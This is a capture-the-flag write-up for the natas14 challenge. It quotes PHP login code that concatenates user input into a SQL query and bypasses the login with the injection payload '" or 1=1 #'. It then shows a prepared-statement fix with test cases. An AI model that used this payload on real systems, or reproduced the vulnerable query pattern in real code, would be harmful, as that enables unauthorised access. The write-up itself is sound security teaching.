Challenge:
We are greeted with a login page where we have to fill in a username and password.

Solving it:
We probably have to do an SQL injection, but let's have a look at the source code.

<html>
<body>
<h1>natas14</h1>
<div id="content">
<?
if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas14', '<censored>');
    mysql_select_db('natas14', $link);
    
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    if(mysql_num_rows(mysql_query($query, $link)) > 0) {
            echo "Successful login! The password for natas15 is <censored><br>";
    } else {
            echo "Access denied!<br>";
    }
    mysql_close($link);
} else {
?>

<form action="index.php" method="POST">
Username: <input name="username"><br>
Password: <input name="password"><br>
<input type="submit" value="Login" />
</form>
<? } ?>
<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html> 

If we look in the source code we can see that the query is as follows: SELECT * from users where username = [username] AND password = [password].

Let's fill in a double quote " to see if we get any MySQL error. Yes, we do.

This means that the login form is probably vulnerable to SQL injection. So let's write down the whole query and build a payload, then substitute the payload into the query to see what it looks like and check whether it will execute.

Query: SELECT * from users where username = "[username]" AND password = "[password]"
Payload: " or 1=1 #
New query: SELECT * from users where username = "" or 1=1 #" AND password = "[password]"

We have to add the double quote at the start of the payload to close the double quote that was opened in the query. Then we add a statement that is always true, so the query returns rows and logs us in. Last, we add a # so that the rest of the query is ignored (commented out). So let's try the payload " or 1=1 # and it worked!
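
The fix for this class of bug is to bind the user input as parameters instead of concatenating it into the query string. The following is an added example, not code from the challenge: the login and param helpers, the sample row and the in-memory SQLite database (standing in for MySQL, and requiring the pdo_sqlite extension) are assumptions.

```php
<?php
// Added example (not the challenge's code): the natas14 login check rewritten
// with bound parameters. In-memory SQLite stands in for MySQL so it runs offline.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// With the MySQL driver, also set PDO::ATTR_EMULATE_PREPARES to false so the
// server receives the statement and the values separately.

// Constructed sample data; the real table contents are not shown on the page.
$pdo->exec('CREATE TABLE users (username TEXT, password TEXT)');
$pdo->exec("INSERT INTO users VALUES ('alice', 'constructed-sample-password')");

// Hypothetical helper: same check as the original, with placeholders
// instead of string concatenation.
function login(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare(
        'SELECT COUNT(*) FROM users WHERE username = :username AND password = :password'
    );
    // Values travel as data, so a quote or # cannot change the statement.
    $stmt->execute([':username' => $username, ':password' => $password]);
    return (int) $stmt->fetchColumn() > 0;
}

// Hypothetical helper: request parameters can arrive as arrays
// (username[]=x), so accept strings only.
function param(array $request, string $key): string
{
    return isset($request[$key]) && is_string($request[$key]) ? $request[$key] : '';
}

// Constructed requests: a valid login, the payload from this write-up,
// and an array-valued parameter.
$cases = [
    'valid credentials' => ['username' => 'alice', 'password' => 'constructed-sample-password'],
    'write-up payload'  => ['username' => '" or 1=1 #', 'password' => ''],
    'array parameter'   => ['username' => ['alice'], 'password' => 'x'],
];

foreach ($cases as $label => $request) {
    $ok = login($pdo, param($request, 'username'), param($request, 'password'));
    echo str_pad($label, 20), $ok ? 'Successful login!' : 'Access denied!', "\n";
}
```

The payload is now compared against the username column as a literal string, so it matches no row. The debug branch that echoes the query should also go, since it shows an attacker exactly how their input lands in the statement.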
